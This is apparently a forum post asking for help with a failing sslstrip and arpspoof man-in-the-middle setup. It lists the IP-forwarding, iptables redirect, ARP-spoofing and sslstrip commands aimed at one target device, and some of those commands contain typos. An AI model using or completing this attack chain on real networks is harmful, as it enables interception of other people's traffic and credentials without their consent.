Hi, so I've been trying to use sslstrip/arpspoof on this laptop and I've been extremely unsuccessful. I'll list everything I've done in the order that I do it:

echo 1 >/proc/sys/net/ipv4/ip_forwad
iptables -t nat -A PREROUTING -p tcp --destination-port -80 -j REDIRECT --to-port 8080
arpspoof -i wlan0 -t *.*.*.* *.*.*.* (target then gateway, yes I've made sure they're both right)
arpspoof -i wlan0 -t *.*.*.* *.*.*.* (gateway then target, I've tried doing it with this and without it)
sslstrip -k -l 8080 -w /root/Desktop/sslstrip.log

And the log file always comes out empty. My target is an individual device, not multiple. After creating the iptable rule if I type iptables -t nat --list it comes up. Any advice? I also tried ettercap and that wasn't working either. After arpspoofing and the device is used the urls are still https.

Thanks!